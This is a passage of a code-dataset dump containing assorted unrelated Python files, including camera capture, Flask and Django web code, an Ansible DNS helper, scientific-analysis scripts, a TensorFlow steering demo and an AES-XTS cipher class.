self.dev.set_device_options(*zip(*custom_options))\n\n                    except self.pyrs.utils.RealsenseError:\n                        print('Could not set camera options')\n\n                # Get depth scale\n                self.scale = self.dev.depth_scale\n            \n            except: #self.pyrs.utils.RealsenseError as e\n                print('Camera not initialized')\n                raise\n        \n        elif self.d400:\n            \n            try:\n                # Configure depth and color streams\n                self.pipeline = 
self.rs.pipeline()\n self.config = self.rs.config()\n self.config.enable_stream(self.rs.stream.depth, depth_width, depth_height, self.rs.format.z16, fps)\n self.config.enable_stream(self.rs.stream.color, color_width, color_height, self.rs.format.bgr8, fps)\n\n # Start streaming\n profile = self.pipeline.start(self.config) # Long to crash, can't input max wait time\n\n # Get depth scale\n depth_sensor = profile.get_device().first_depth_sensor()\n self.scale = depth_sensor.get_depth_scale()\n\n self.align_to = self.rs.stream.color\n self.align = self.rs.align(self.align_to)\n \n except:\n print('Camera not initialized')\n raise\n \n else:\n print('No camera was selected')\n \n def GetScale(self):\n return self.scale\n \n def GetCapture(self):\n \n if self.r200:\n try:\n # Wait for frames\n self.dev.wait_for_frames()\n\n depth_frame = self.dev.depth\n color_frame = self.dev.color\n color_frame = cv.cvtColor(color_frame, cv.COLOR_RGB2BGR)\n \n except:\n raise\n \n elif self.d400:\n try:\n # Wait for a coherent pair of frames: depth and color\n frames = self.pipeline.wait_for_frames(700) # 700 ms before raising an exception\n \n aligned_frames = self.align.process(frames)\n aligned_depth_frame = aligned_frames.get_depth_frame() \n color_frame = aligned_frames.get_color_frame()\n # depth_frame = frames.get_depth_frame()\n # color_frame = frames.get_color_frame()\n\n if not aligned_depth_frame or not color_frame:\n print('Will have to implement continue') #continue #make this operational with a custom exception ?\n\n # Convert images to numpy arrays\n depth_frame = np.asanyarray(aligned_depth_frame.get_data())\n color_frame = np.asanyarray(color_frame.get_data()) \n # depth_image = np.asanyarray(depth_frame.get_data())\n # color_image = np.asanyarray(color_frame.get_data())\n\n # Produce good stream\n # depth_frame = depth_image\n # color_frame = color_image\n \n except:\n raise\n \n # Will this pass the object by reference and cause problems ?\n frame = R200Frame(color_frame, depth_frame, self.scale)\n \n return (frame)\n \n def StopStreaming(self):\n \n if self.r200:\n \n self.dev.stop()\n self.serv.stop()\n \n elif self.d400:\n \n self.pipeline.stop()","sub_path":"intelcamera.py","file_name":"intelcamera.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"440214010","text":"from flask import Flask,request, make_response\nimport numpy as np\nimport cv2\nimport io\nimport logging\nfrom zipfile import ZipFile, ZipInfo\nimport zipfile\nfrom gnomes.cube import Cube\nfrom math import sin,cos,pi, radians\n\n'''\n\nJust a circle moving through all 3 screens of a module in straight line\n\n'''\n\n\n# basic Flask settings\napp = Flask(__name__)\napp.config.update(\n FAKE_LATENCY_BEFORE=1,\n)\napp.debug = True\nlog = logging.getLogger('werkzeug')\nlog.disabled = True\n\n\n# for drawing a circle\nx = 120\ny = 120\ndirection = 'up'\n\n\n# function changes circle's coordinates (goes from screen 0\ndef move_circle():\n global x, y, direction\n if direction == 'up':\n y += 10\n if y >= 360:\n direction = 'left'\n return x, y\n if direction == 'left':\n # remember the last y position so that circle can move straight down\n x += 10\n if x >= 360:\n direction = 'right'\n return x, y\n if direction == 'right':\n x -= 10\n if x <= 120:\n direction = 'down'\n return x, y\n if direction == 'down':\n y -= 10\n if y <= 120:\n direction = 'up'\n return x, y\n\n\n\n@app.route('/test', methods=['GET', 'POST'])\ndef draw():\n 
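# The POSTed grid describes the current cube layout; each module renders one image per screen\n    # and the reply is a zip whose entry paths encode which module/screen an image belongs to.\n    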
# moving the object with each request\n x, y = move_circle()\n # images to be put it zip archive\n images = []\n # creating a cube to work with\n cube = Cube()\n cube.update_grid(request)\n # all modules of the cube\n modules = cube.modules\n for module in modules:\n for img in module.update_screens(x, y):\n images.append(img)\n # put the images into the response archive\n memory_file = io.BytesIO()\n img_num = 0\n with ZipFile(memory_file, \"w\") as zip_file:\n for module in range(cube.num_modules):\n for screen in range(cube.num_screens // cube.num_modules):\n output_img = images[img_num]\n encode_param = []\n # encode each of 24 images\n _, buffer = cv2.imencode('.bmp', output_img, encode_param)\n # add a specific info about the module this image belongs to\n # so first 3 images go to the first module, images 4, 5, 6 - to the second etc.\n zip_info = ZipInfo(\"modules/\" + str(module) + \"/screens/\" + str(screen) + \".bmp\")\n zip_info.compress_type = zipfile.ZIP_DEFLATED\n zip_info.compress_size = 1\n # insert the image into the archive\n zip_file.writestr(zip_info, buffer)\n img_num += 1\n memory_file.seek(0)\n response = make_response(memory_file.read())\n response.headers['Content-Type'] = 'application/zip'\n return response\n\n\n\nif __name__ == \"__main__\":\n\n host = None\n port = 2399\n threaded = True\n # starting the Flask app itself\n app.run(host=host, port=port, threaded=threaded)","sub_path":"gnomes/around_the_module.py","file_name":"around_the_module.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"162789540","text":"import csv\nimport os\n\nfname = \"./data/user_study/userStudy_yes_no_regional.csv\"\nfname_out = \"./data_/correlation/userStudy_scores_regional.csv\"\nsentences_ = list()\n\nactions = list()\n\nbias_dict = dict()\nwith open(fname, \"r\") as f:\n for i, line in enumerate(f.readlines()):\n if i == 0:\n continue\n line = line.rstrip('\\n')\n vect = line.split(',')\n actions.append(vect[0])\n acc = float(vect[1]) / (float(vect[1]) + float(vect[2]))\n bias_dict[vect[0]] = acc\n\ncsv_columns = ['Action', 'Score']\nos.makedirs(os.path.dirname(fname_out), exist_ok=True)\nwith open(fname_out, 'w') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(csv_columns)\n for action in actions:\n data_row = [\n action,\n bias_dict[action]\n ]\n writer.writerow(data_row)\n","sub_path":"MoRT/mort/plot_corr/compute_userstudy_scores.py","file_name":"compute_userstudy_scores.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"613191688","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2016, René Moser \n# Simplified BSD License (see licenses/simplified_bsd.txt or https://opensource.org/licenses/BSD-2-Clause)\n\nimport os\n\nfrom ansible.module_utils.six.moves import configparser\nfrom ansible.module_utils.six import integer_types, string_types\nfrom ansible.module_utils._text import to_native, to_text\nfrom ansible.module_utils.urls import fetch_url\n\nEXO_DNS_BASEURL = \"https://api.exoscale.ch/dns/v1\"\n\n\ndef exo_dns_argument_spec():\n return dict(\n api_key=dict(default=os.environ.get('CLOUDSTACK_KEY'), no_log=True),\n api_secret=dict(default=os.environ.get('CLOUDSTACK_SECRET'), no_log=True),\n api_timeout=dict(type='int', default=os.environ.get('CLOUDSTACK_TIMEOUT') or 10),\n api_region=dict(default=os.environ.get('CLOUDSTACK_REGION') or 'cloudstack'),\n 
validate_certs=dict(default=True, type='bool'),\n )\n\n\ndef exo_dns_required_together():\n return [['api_key', 'api_secret']]\n\n\nclass ExoDns(object):\n\n def __init__(self, module):\n self.module = module\n\n self.api_key = self.module.params.get('api_key')\n self.api_secret = self.module.params.get('api_secret')\n if not (self.api_key and self.api_secret):\n try:\n region = self.module.params.get('api_region')\n config = self.read_config(ini_group=region)\n self.api_key = config['key']\n self.api_secret = config['secret']\n except Exception as e:\n self.module.fail_json(msg=\"Error while processing config: %s\" % to_native(e))\n\n self.headers = {\n 'X-DNS-Token': \"%s:%s\" % (self.api_key, self.api_secret),\n 'Content-Type': 'application/json',\n 'Accept': 'application/json',\n }\n self.result = {\n 'changed': False,\n 'diff': {\n 'before': {},\n 'after': {},\n }\n }\n\n def read_config(self, ini_group=None):\n if not ini_group:\n ini_group = os.environ.get('CLOUDSTACK_REGION', 'cloudstack')\n\n keys = ['key', 'secret']\n env_conf = {}\n for key in keys:\n if 'CLOUDSTACK_%s' % key.upper() not in os.environ:\n break\n else:\n env_conf[key] = os.environ['CLOUDSTACK_%s' % key.upper()]\n else:\n return env_conf\n\n # Config file: $PWD/cloudstack.ini or $HOME/.cloudstack.ini\n # Last read wins in configparser\n paths = (\n os.path.join(os.path.expanduser('~'), '.cloudstack.ini'),\n os.path.join(os.getcwd(), 'cloudstack.ini'),\n )\n # Look at CLOUDSTACK_CONFIG first if present\n if 'CLOUDSTACK_CONFIG' in os.environ:\n paths += (os.path.expanduser(os.environ['CLOUDSTACK_CONFIG']),)\n if not any([os.path.exists(c) for c in paths]):\n self.module.fail_json(msg=\"Config file not found. Tried : %s\" % \", \".join(paths))\n\n conf = configparser.ConfigParser()\n conf.read(paths)\n return dict(conf.items(ini_group))\n\n def api_query(self, resource=\"/domains\", method=\"GET\", data=None):\n url = EXO_DNS_BASEURL + resource\n if data:\n data = self.module.jsonify(data)\n\n response, info = fetch_url(\n module=self.module,\n url=url,\n data=data,\n method=method,\n headers=self.headers,\n timeout=self.module.params.get('api_timeout'),\n )\n\n if info['status'] not in (200, 201, 204):\n self.module.fail_json(msg=\"%s returned %s, with body: %s\" % (url, info['status'], info['msg']))\n\n try:\n return self.module.from_json(to_text(response.read()))\n\n except Exception as e:\n self.module.fail_json(msg=\"Could not process response into json: %s\" % to_native(e))\n\n def has_changed(self, want_dict, current_dict, only_keys=None):\n changed = False\n for key, value in want_dict.items():\n # Optionally limit by a list of keys\n if only_keys and key not in only_keys:\n continue\n # Skip None values\n if value is None:\n continue\n if key in current_dict:\n if isinstance(current_dict[key], integer_types):\n if value != current_dict[key]:\n self.result['diff']['before'][key] = current_dict[key]\n self.result['diff']['after'][key] = value\n changed = True\n elif isinstance(current_dict[key], string_types):\n if value.lower() != current_dict[key].lower():\n self.result['diff']['before'][key] = current_dict[key]\n self.result['diff']['after'][key] = value\n changed = True\n else:\n self.module.fail_json(msg=\"Unable to determine comparison for key %s\" % key)\n else:\n self.result['diff']['after'][key] = value\n changed = True\n return 
changed\n","sub_path":"env/lib/python3.9/site-packages/ansible/module_utils/exoscale.py","file_name":"exoscale.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"448174416","text":"# %%\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt # 3.3 or higher\nfrom pyglotaran_examples.boilerplate import setup_case_study\nfrom pyglotaran_extras.plotting.plot_overview import plot_overview\nfrom pyglotaran_extras.plotting.style import PlotStyle\n\nfrom glotaran import read_model_from_yaml_file\nfrom glotaran import read_parameters_from_csv_file\nfrom glotaran import read_parameters_from_yaml_file\nfrom glotaran.analysis.optimize import optimize\nfrom glotaran.analysis.scheme import Scheme\nfrom glotaran.io import read_data_file\n\nDATA_PATH1 = \"data/Npq2_220219_800target3fasea.ascii\"\nDATA_PATH2 = \"data/trNpq2_220219_800target3fase10SAS5.ascii\"\nMODEL_PATH = \"models/model_guidance.yml\"\nPARAMETERS_FILE_PATH = \"models/parameters_guidance.yml\"\n\n# %% Setup necessary (output) paths\nresults_folder, script_folder = setup_case_study(Path(__file__))\noutput_folder = results_folder.joinpath(\"example_spectral_guidance\")\n\n\ndef main():\n\n # parameter_file = output_folder.joinpath(\"optimized_parameters.csv\")\n # if parameter_file.exists():\n # print(\"Optimized parameters exists: please check\")\n # parameters = read_parameters_from_csv_file(str(parameter_file))\n # else:\n # parameters = read_parameters_from_yaml_file(script_folder.joinpath(PARAMETERS_FILE_PATH))\n parameters = read_parameters_from_yaml_file(script_folder.joinpath(PARAMETERS_FILE_PATH))\n # %% Load in data, model and parameters\n dataset1 = read_data_file(script_folder.joinpath(DATA_PATH1))\n dataset2 = read_data_file(script_folder.joinpath(DATA_PATH2))\n model = read_model_from_yaml_file(script_folder.joinpath(MODEL_PATH))\n\n # %% Validate model and parameters\n print(model.validate(parameters=parameters))\n\n # %% Construct the analysis scheme\n scheme = Scheme(\n model,\n parameters,\n {\"dataset1\": dataset1, \"dataset2\": dataset2},\n optimization_method=\"Levenberg-Marquardt\",\n # maximum_number_function_evaluations=11,\n non_negative_least_squares=True,\n )\n\n # %% Optimize the analysis scheme (and estimate parameters)\n result = optimize(scheme)\n\n # %% Basic print of results\n print(result.markdown(True))\n\n return result\n\n\ndef save_result(result):\n # %% Save the results\n result.save(str(output_folder))\n\n\ndef load_and_plot_results():\n # %% Plot and save as PDF\n # This set subsequent plots to the glotaran style\n plot_style = PlotStyle()\n plt.rc(\"axes\", prop_cycle=plot_style.cycler)\n\n parameter_file = output_folder.joinpath(\"optimized_parameters.csv\")\n parameters = read_parameters_from_csv_file(str(parameter_file))\n print(f\"Optimized parameters loaded:\\n {parameters}\")\n\n result1 = output_folder.joinpath(\"dataset1.nc\")\n fig1 = plot_overview(result1, linlog=True, show_data=True)\n timestamp = datetime.today().strftime(\"%y%m%d_%H%M\")\n fig1.savefig(\n output_folder.joinpath(f\"plot_overview_1of2_{timestamp}.pdf\"), bbox_inches=\"tight\"\n )\n\n result2 = output_folder.joinpath(\"dataset2.nc\")\n fig2 = plot_overview(result2, linlog=True)\n timestamp = datetime.today().strftime(\"%y%m%d_%H%M\")\n fig2.savefig(\n output_folder.joinpath(f\"plot_overview_2of2_{timestamp}.pdf\"), bbox_inches=\"tight\"\n )\n plt.show()\n\n\nif __name__ == \"__main__\":\n 
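# Entry point: run the optimization, persist the result, then reload it for plotting.\n    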
print(f\"- Using folder {output_folder.name} to read/write files for this run\")\n result = main()\n save_result(result)\n load_and_plot_results()\n","sub_path":"pyglotaran_examples/ex_spectral_guidance/ex_spectral_guidance.py","file_name":"ex_spectral_guidance.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"609512282","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom thumbor.filters import BaseFilter, filter_method\n\n\nclass Filter(BaseFilter):\n @filter_method(\n BaseFilter.String,#word\n BaseFilter.PositiveNumber,#posX\n BaseFilter.PositiveNumber,#posY\n BaseFilter.String,#color name see: http://pillow.readthedocs.io/en/4.0.x/reference/ImageColor.html#color-names\n BaseFilter.PositiveNumber, #font-size\n BaseFilter.String, #font-family\n )\n def text(self, word, x, y, color, font_size, font_family=\"Tahoma\"):\n image = self.engine.image\n usr_font = ImageFont.truetype(font_family, font_size)\n drawer = ImageDraw.Draw(image)\n drawer.text((x, y), word, fill=color, font=usr_font)\n self.engine.image = image\n","sub_path":"thumbor_text_filter/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"368084018","text":"from itertools import islice\nfrom commit import commitWord\n\nprompt_string = 'Yes(y) | No(n) | Maybe(m) | Quit (q)?\\n'\n\nyes_option = ['yes', 'y']\nno_option = ['no', 'n']\nmaybe_option = ['maybe', 'm']\nquit_option = ['quit', 'q']\n\ninput_filename = \"tst\"\nreplacements_filename = '../scripts/Sources/stringReplacer/replacements'\napprovelist_filename = '../scripts/Sources/wordBreakingValidator/approveList'\n\nacceptable_answers = yes_option + no_option + maybe_option + quit_option\n\ndef next_n_lines(file_opened, N = 4):\n return [x.strip() for x in islice(file_opened, N)]\n\ndef do_yes_things(word, suggestion):\n with open(replacements_filename, \"a\") as file_obj:\n file_obj.write(f\"{suggestion}{word} \")\n file_obj.write('\\n')\n print('word: {} added to file: {}'.format(suggestion, replacements_filename))\n\ndef do_no_things(suggestion):\n with open(approvelist_filename, \"a\") as file_obj:\n file_obj.write(suggestion)\n file_obj.write('\\n')\n print('word: {} added to file: {}'.format(suggestion, approvelist_filename))\n\ndef do_maybe_things():\n pass\n\n\nwith open(input_filename) as file_obj:\n next_n_lines(file_obj, 2)\n \n arr = next_n_lines(file_obj)\n while len(arr) == 4:\n empty_line = arr[0]\n text = arr[1].split(':')\n suggestion = arr[2].split(':')\n frequency = arr[3].split(':')\n \n print('Text: {}, Suggestion: {}, Frequency {}'.format(text[1], suggestion[1], frequency[1]))\n print('\\n\\n')\n \n answer = input(prompt_string)\n while answer not in acceptable_answers:\n answer = input(prompt_string)\n \n if answer in quit_option:\n break\n \n if answer in yes_option:\n do_yes_things(text[1], suggestion[1])\n \n if answer in no_option:\n do_no_things(suggestion[1])\n \n if answer in maybe_option:\n do_maybe_things()\n \n arr = next_n_lines(file_obj)\n","sub_path":"tools/wordBreakCheck.py","file_name":"wordBreakCheck.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"570613038","text":"\nfrom rest_framework import serializers\nfrom django_redis import 
get_redis_connection\n\n# Define the serializer used to validate the generated data\nfrom utils.exceptions import logger\n\n\nclass RegisterSMSCodeSerializer(serializers.Serializer):\n    text = serializers.CharField(label='user-entered captcha id',max_length=4,min_length=4,required=True)\n    image_code_id = serializers.UUIDField(label='captcha uniqueness')\n\n    def validate(self,attrs):\n        # Get the captcha submitted by the user\n        text = attrs['text']\n        image_code_id = attrs['image_code_id']\n        print(image_code_id)\n\n        # Get the value stored in redis\n        # # connect to redis\n        redis_conn = get_redis_connection('code')\n        # image_id = redis_conn.get('image_code_id')\n        print(image_code_id)\n        redis_text = redis_conn.get('img_'+str(image_code_id))\n        print(redis_text)\n        # Check whether redis_text exists\n        if redis_text is None:\n            raise serializers.ValidationError('The captcha has expired')\n        # Delete the captcha from redis\n        # try:\n        #     redis_conn.delete('image_'+image_code_id)\n        # except Exception as e:\n        #     logger.error(e)\n        # Check that the user-entered captcha matches the one stored in redis\n        if redis_text.decode().lower() != text.lower():\n            raise serializers.ValidationError('Incorrect captcha')\n\n        return attrs\n\n\n\n","sub_path":"mall/apps/verifications/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"202709466","text":"import os\nimport gevent\nfrom flask import Flask\nfrom flask_socketio import SocketIO\n\nfrom lib import create_recordings_saver\nfrom cloudasr.schema import db, session\nfrom cloudasr.models import WorkerTypesModel, RecordingsModel\nimport logging\n\n#logging.basicConfig()\n#logging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)\n\napp = Flask(__name__)\n\nif 'CONNECTION_STRING' in os.environ:\n    app.config.update(\n        SECRET_KEY = '12345',\n        DEBUG = False,\n        SQLALCHEMY_POOL_RECYCLE=299,\n        SQLALCHEMY_DATABASE_URI = os.environ['CONNECTION_STRING']\n    )\nelif 'CONNECTION_STRING_FILE' in os.environ:\n    scrfilepath = os.environ['CONNECTION_STRING_FILE']\n    fl = open(scrfilepath,\"r\")\n    app.config.update(\n        SECRET_KEY = '12345',\n        DEBUG = False,\n        SQLALCHEMY_POOL_RECYCLE = 299,\n        SQLALCHEMY_DATABASE_URI = fl.readline().replace('\\n', '')\n    )\n    fl.close()\nelse:\n    print(\"Connection string not set\")\nsocketio = SocketIO(app)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb.init_app(app)\nwith app.app_context():\n    db_session = session\n\nworker_types_model = WorkerTypesModel(db_session)\nrecordings_model = RecordingsModel(db_session, worker_types_model, os.environ['STORAGE_PATH'], os.environ['DOMAIN'])\nsaver = create_recordings_saver(\"tcp://0.0.0.0:5682\", recordings_model)\n\nif __name__ == \"__main__\":\n    from gevent import monkey\n    monkey.patch_all()\n    gevent.spawn(saver.run)\n    socketio.run(app, host=\"0.0.0.0\", port=80)\n","sub_path":"cloudasr/recordings/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"198900155","text":"n, k = map(int, input().split())\nwords = []\nvisited = [False] * 26\nresult = 0\n\nfor _ in range(n):\n    word = input().replace('anta', '').replace('tica', '')\n    # store letter indices so the visited list can be indexed directly\n    words.append([ord(c) - 97 for c in word])\n\nif k < 5:\n    print(0)\n    exit()\nelif k == 26:\n    print(n)\n    exit()\n\nfor c in 'antic':\n    visited[ord(c) - 97] = True\n\n\ndef backtracking(alpha, length):\n    global result, visited\n\n    if length == k - 5:\n        count = 0\n\n        for word in words:\n            read = True\n            for c in word:\n                if not visited[c]:\n                    read = False\n                    break\n\n            if read:\n                count += 1\n\n        result = max(result, count)\n\n    for i in range(alpha, 26):\n        if not visited[i]:\n            visited[i] 
= True\n backtracking(i, length + 1)\n visited[i] = False\n\n\nbacktracking(0, 0)\nprint(result)\n","sub_path":"baekjoon/bruteforce/1062.py","file_name":"1062.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"79999209","text":"import tensorflow as tf\nimport scipy.misc\nimport model\nimport cv2\nfrom subprocess import call\nimport zmq\nimport struct\nimport numpy as np\n\nDEFAULT_CHECKPT_FILE = '/etc/vision_extra/configs/default_checkpoint'\nTENSOR_MSG_HEADER_FMT = 'iiiiiqq'\n# SHAPE = (360, 480, 3)\nSHAPE = (66, 200, 3)\n\ndef create_sockets(camera_addr, ctx):\n cam_sock = ctx.socket(zmq.SUB)\n cam_sock.setsockopt(zmq.SUBSCRIBE, b'')\n cam_sock.connect(camera_addr)\n print('connected to {}'.format(camera_addr))\n return cam_sock\n\ndef recv_camera_frame(cam_sock):\n img_header, img_data, image = None, None, None\n flags = 0\n while True:\n try:\n data_img_header = cam_sock.recv(flags)\n except zmq.ZMQError as e:\n if e.errno != zmq.EAGAIN: raise\n break\n img_header = struct.unpack(TENSOR_MSG_HEADER_FMT, data_img_header)\n img_data = cam_sock.recv()\n flags = zmq.NOBLOCK\n image = np.frombuffer(img_data, np.uint8).reshape(img_header[:4])\n return img_header, image\n\nsess = tf.InteractiveSession()\nsaver = tf.train.Saver()\nsaver.restore(sess, \"save/model.ckpt\")\n\nimg = cv2.imread('steering_wheel_image.jpg',0)\nrows,cols = img.shape\n\nsmoothed_angle = 0\n\ncap = cv2.VideoCapture(0)\n\nctx = zmq.Context()\ncam_sock = create_sockets('ipc:///tmp/roborace_camera_FL', ctx)\n\nimage_b = np.zeros(SHAPE, np.uint8)\n\nwhile(cv2.waitKey(10) != ord('q')):\n # ret, frame = cap.read()\n\n img_header, image = recv_camera_frame(cam_sock)\n cv2.resize(image[0], dsize=(SHAPE[1], SHAPE[0]), dst=image_b,\n interpolation=cv2.INTER_NEAREST)\n\n degrees = model.y.eval(feed_dict={model.x: [image_b], model.keep_prob: 1.0})[0][0] * 180 / scipy.pi\n call(\"clear\")\n print(\"Predicted steering angle: \" + str(degrees) + \" degrees\")\n cv2.imshow('image_b', image[0])\n #make smooth angle transitions by turning the steering wheel based on the difference of the current angle\n #and the predicted angle\n smoothed_angle += 0.2 * pow(abs((degrees - smoothed_angle)), 2.0 / 3.0) * (degrees - smoothed_angle) / abs(degrees - smoothed_angle)\n M = cv2.getRotationMatrix2D((cols/2,rows/2),-smoothed_angle,1)\n dst = cv2.warpAffine(img,M,(cols,rows))\n cv2.imshow(\"steering wheel\", dst)\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"run_rr.py","file_name":"run_rr.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"507130413","text":"\"\"\"This file contains functions to perfrom hypothesis testing using R.\"\"\"\nimport rpy2.robjects as robjects\n\nwilcox_r = robjects.r['wilcox.test']\nshapiro_r = robjects.r['shapiro.test']\nnumeric = robjects.r['as.numeric']\nt_r = robjects.r['t.test']\n\n\ndef wilcox(x, y, alternative=\"two.sided\"):\n \"\"\"\n Return wilcox of x and y.\n\n Source: https://www.rdocumentation.org/packages/stats/versions/3.6.1/topics/wilcox.test\n :param x,y\n :param alternative: \"two.sided\", \"less\", \"greater\"\n \"\"\"\n if all(r==x[0] for r in x) or all(r==y[0] for r in y):\n return 1\n x_num = numeric(x)\n y_num = numeric(y)\n return wilcox_r(x_num, y_num, alternative=alternative).rx(\"p.value\")[0][0]\n\n\ndef t_test(x, y, alternative=\"two.sided\"):\n \"\"\"\n Return wilcox of x and y.\n\n 
Source https://www.rdocumentation.org/packages/stats/versions/3.6.1/topics/wilcox.test\n :param x,y\n :param alternative: \"two.sided\", \"less\", \"greater\"\n \"\"\"\n x_num = numeric(x)\n y_num = numeric(y)\n return t_r(x_num, y_num, alternative=alternative).rx(\"p.value\")[0][0]\n","sub_path":"chip2probe/util/stats_r.py","file_name":"stats_r.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"177333895","text":"from binascii import hexlify as hx, unhexlify as uhx\r\n\r\nfrom ...log import LogBase\r\n\r\nfrom .aesecb import AESECB\r\nfrom .common import sxor\r\n\r\n\r\nclass AESXTS(LogBase):\r\n '''Class for performing AES XTS cipher operations'''\r\n SectorSize: int=0x200\r\n def __init__(self, keys, sector=0):\r\n self.keys = keys[:16], keys[16:]\r\n if not(type(self.keys) is tuple and len(self.keys) == 2):\r\n raise TypeError('XTS mode requires a tuple of two keys.')\r\n self.K1 = AESECB(self.keys[0])\r\n self.K2 = AESECB(self.keys[1])\r\n\r\n self.sector = sector\r\n self.block_size = self.K1.block_size\r\n \r\n self.sector_size = AESXTS.SectorSize\r\n\r\n def __enter__(self):\r\n return self\r\n\r\n def encrypt(self, data, sector=None):\r\n if sector is None:\r\n sector = self.sector\r\n if len(data) % self.block_size:\r\n raise ValueError('Data is not aligned to block size!')\r\n out = b''\r\n while data:\r\n tweak = self.get_tweak(sector)\r\n out += self.encrypt_sector(data[:self.sector_size], tweak)\r\n data = data[self.sector_size:]\r\n sector += 1\r\n return out\r\n\r\n def encrypt_sector(self, data, tweak):\r\n if len(data) % self.block_size:\r\n raise ValueError('Data is not aligned to block size!')\r\n out = b''\r\n tweak = self.K2.encrypt(uhx('%032X' % tweak))\r\n while data:\r\n out += sxor(tweak, self.K1.encrypt(sxor(data[:0x10], tweak)))\r\n _t = int(hx(tweak[::-1]), 16)\r\n _t <<= 1\r\n if _t & (1 << 128):\r\n _t ^= ((1 << 128) | (0x87))\r\n tweak = uhx('%032X' % _t)[::-1]\r\n data = data[0x10:]\r\n return out\r\n\r\n def decrypt(self, data, sector=None):\r\n #log(f\"[aes128.py] [decrypt] len(data)={len(data)} | sector={sector}\")\r\n if sector is None:\r\n sector = self.sector\r\n if len(data) % self.block_size:\r\n raise ValueError('Data is not aligned to block size!')\r\n out = b''\r\n while data:\r\n tweak = self.get_tweak(sector)\r\n out += self.decrypt_sector(data[:self.sector_size], tweak)\r\n data = data[self.sector_size:]\r\n sector += 1\r\n return out\r\n\r\n def decrypt_sector(self, data, tweak):\r\n if len(data) % self.block_size:\r\n raise ValueError('Data is not aligned to block size!')\r\n out = b''\r\n tweak = self.K2.encrypt(uhx('%032X' % tweak))\r\n while data:\r\n a = self.K1.decrypt(sxor(data[:0x10], tweak))\r\n out += sxor(tweak, a)\r\n _t = int(hx(tweak[::-1]), 16)\r\n _t <<= 1\r\n if _t & (1 << 128):\r\n _t ^= ((1 << 128) | (0x87))\r\n tweak = uhx('%032X' % _t)[::-1]\r\n data = data[0x10:]\r\n return out\r\n\r\n def get_tweak(self, sector=None):\r\n if sector is None:\r\n sector = self.sector\r\n tweak = 0\r\n for i in range(self.block_size):\r\n tweak |= (sector & 0xFF) << (i * 8)\r\n sector >>= 8\r\n return tweak\r\n\r\n def set_sector(self, sector):\r\n self.sector = sector\r\n\r\n def __exit__(self, type, value, traceback):\r\n pass\r\n","sub_path":"pyhac/common/crypto/aes128/aesxts.py","file_name":"aesxts.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 
+{"seq_id":"157778648","text":"####################################\n####### General Library file #######\n####################################\n\nfrom .common_imports import *\n\n\n# import pycuda.autoinit\n# import pycuda.gpuarray as gpuarray\n# ONLY FOR LINUX\n# import skcuda.fft as cu_fft\n\ndef sampleSignal(signal, time, sample_frequency):\n \"\"\"Apply sampling on given signal.\"\"\"\n\n sampled_wave_time = []\n sampled_wave = []\n next_sample = 0\n \n # time interval between samples\n delta_t = 1/sample_frequency\n \n ## TODO -- maybe should interpolate first? .... \n ## TODO -- Should it take the average of the signal on a given time span???\n\n # sample approximately on the correct timing\n for idx,time in enumerate(time):\n if time >= next_sample:\n next_sample += delta_t\n sampled_wave_time.append(time)\n sampled_wave.append(signal[idx])\n \n sampled_wave_time = np.array(sampled_wave_time)\n sampled_wave = np.array(sampled_wave)\n return sampled_wave, sampled_wave_time\n\ndef assembleWaveListSameInterval(signal_list, time_interval, time_step):\n \"\"\"Given list of signals, concatenate them on a single np array, provided they have the same duration on each wave on list, and time step defining distance between points in each wave.\"\"\"\n\n # variable to shift data right, for each time frame passed\n shift = 0\n \n number_of_points = int(time_interval/time_step)\n # all_zeros = np.zeros((1+len(signal_list))*number_of_points)\n all_zeros = np.zeros(len(signal_list)*number_of_points)\n out_wave_train = all_zeros.copy()*(0+0j)\n\n for data in signal_list:\n # starts vector with all zeros plus actual data\n new_data = sumVectosDiffSizes(all_zeros.copy()*(0+0j), data)\n \n new_data = np.roll(new_data, (shift)*number_of_points)\n shift += 1\n\n\n out_wave_train = sumVectosDiffSizes(out_wave_train, new_data)\n out_wave_time = np.arange(0, len(out_wave_train))*time_step\n \n return out_wave_train, out_wave_time\n\ndef assembleWaveListDifferentIntervals(signal_list, time_interval_list, num_symbols, time_step):\n \"\"\"Given list of signals, list of time intervals for each symbol, and number of symbol for each, concatenate them on a single np array, given the same time step defining distance between points in each 